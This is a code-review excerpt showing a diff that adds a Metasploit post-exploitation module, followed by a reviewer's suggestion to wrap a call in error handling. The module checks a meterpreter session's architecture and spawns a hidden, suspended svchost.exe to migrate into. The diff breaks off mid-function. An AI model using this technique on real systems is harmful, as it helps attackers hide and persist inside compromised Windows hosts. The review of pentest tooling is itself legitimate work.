modules/post/windows/manage/archmigrate.rb

```diff
@@ -0,0 +1,85 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::File
+  include Msf::Post::Common
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'      => 'Architecture Migrate',
+      'Description'   => %q{This module checks if the meterpreter architecture is the same as the OS architecture and if it's incompatible it spawns a new process with the correct architecture and migrates into that process.},
+      'License'     => MSF_LICENSE,
+      'Author'    => ['Koen Riepe (koen.riepe@fox-it.com)'],
+      'References'  => [''],
+      'Platform'    => [ 'win' ],
+      'Arch'      => [ 'x86', 'x64' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+    ))
+
+  register_options(
+  [
+    OptString.new('EXE', [true, 'The executable to start and migrate into', 'C:\windows\sysnative\svchost.exe']),
+    OptBool.new('FALLBACK', [ true, 'If the selected migration executable does not exist fallback to a sysnative file', true ])
+  ], self.class)
+  end
+
+  def is_32_bit_on_64_bits
+    begin
+      apicall = session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"]
+      if apicall == "\x00\x00\x00\x00"
+        migrate = false
+      else
+        migrate = true
+      end
+      return migrate
+    rescue
+      print_error('Railgun not available, this module only works for binary meterpreters.')
+    end
+  end
+
+  def get_windows_loc
+    apicall = session.railgun.kernel32.GetEnvironmentVariableA("Windir", 255, 255)["lpBuffer"]
+    windir = apicall.split(":")[0]
+    return windir
+  end
+
+  def run
+    if is_32_bit_on_64_bits
+      print_status('The meterpreter is not the same architecture as the OS! Upgrading!')
+      newproc = datastore['EXE']
+      if exist?(newproc)
+        print_status("Starting new x64 process #{newproc}")
+        pid = session.sys.process.execute(newproc, nil, {'Hidden' => true, 'Suspended' => true}).pid
```

Comment:
I'm guessing `session.sys.process.execute` can generate a fault, so you may want to nest this in a try/catch block so it can gracefully exit.